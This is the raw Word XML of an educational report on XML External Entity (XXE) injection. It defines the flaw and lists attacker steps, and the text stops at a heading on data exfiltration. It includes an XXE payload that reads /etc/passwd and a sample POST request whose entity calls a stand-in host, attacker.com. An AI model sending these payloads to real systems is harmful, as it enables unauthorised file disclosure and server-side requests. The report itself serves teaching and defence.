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0323599E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>In-Depth Research Report on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>XXE Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E25EB33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FE3E0C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5D9D99">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2E2AB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B98A75D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1734BCC6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4933EC56">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AAB3ADC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447D818B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C407DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2768600"/>
            <wp:effectExtent l="0" t="0" r="10160" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="XXE 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XE img"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273040" cy="2768600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07358E5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D59D92B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5444CC41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766AB0C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6505F591">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FCA840">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4787C72C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4458C3E3">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116D17D7">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>What is XXE Injection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71561BF0">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>How to Perform XXE Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA67A5">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Types of Attacks through XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E875AD4">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Impact of XXE Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A3AD72">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Mitigation Measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC6371">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDB8214">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F85BC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F586AF7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B77F188">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>XML External Entity (XXE) injection is a vulnerability that occurs when an application parses XML input containing a reference to an external entity. This can lead to various types of attacks, such as data exfiltration, denial of service, and server-side request forgery (SSRF). Understanding XXE injection is crucial for developers and security professionals to protect applications from exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251AB795">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2. What is XXE Injection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB6A111">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>XXE injection is a specific type of security vulnerability that allows an attacker to interfere with the processing of XML data. The XML specification allows the inclusion of external entities in XML documents. When an application improperly handles these entities, it can expose sensitive data, cause application malfunctions, or facilitate other types of attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E7832B">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3971290" cy="2382520"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="2" name="Picture 2" descr="What is XXE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 is XXE attack"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3971290" cy="2382520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3939E7">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Key Components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21713B30">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>External Entity</w:t>
      </w:r>
      <w:r>
        <w:t>: A reference to an external resource, often defined in the XML document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B50F43">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Entity Declaration</w:t>
      </w:r>
      <w:r>
        <w:t>: The section of the XML where external entities are declared.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCD4A40">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B8E0B4">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305154DB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79950D49">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>&lt;foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56710130">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;bar&gt;&amp;xxe;&lt;/bar&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2572DF67">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460CCA0C">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the above example, if processed by a vulnerable application, the contents of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> could be returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF10D5E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3. How to Perform XXE Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A44B49D">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>To exploit XXE, an attacker typically follows these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62910E0F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Identify XML Input</w:t>
      </w:r>
      <w:r>
        <w:t>: Find a point in the application where XML is accepted (e.g., API endpoints).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D64DD44">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Craft Payload</w:t>
      </w:r>
      <w:r>
        <w:t>: Create a malicious XML document that includes an external entity reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595F9215">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Send Request</w:t>
      </w:r>
      <w:r>
        <w:t>: Submit the crafted XML to the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17887E52">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Observe Response</w:t>
      </w:r>
      <w:r>
        <w:t>: Check the response to see if sensitive information has been leaked or other undesired actions have been executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C967E00">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFA4EA5">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32398DB0">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66055" cy="1824990"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="3" name="Picture 3" descr="how to perform xxe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w to perform xxe injection"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266055" cy="1824990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E83AE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Example Request:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>POST /api/endpoint HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A2B6C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Content-Type: application/xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9AD682">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76DFFF3C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EB3E38">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;!ENTITY xxe SYSTEM "http://attacker.com/malicious"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574318CB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED05A2A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>&lt;foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37644B45">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;bar&gt;&amp;xxe;&lt;/bar&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADC5706">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C6A082">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>4. Types of Attacks through XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017DCAE4">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>XXE vulnerabilities can lead to various types of attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B86B861">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Data Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A682B1">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
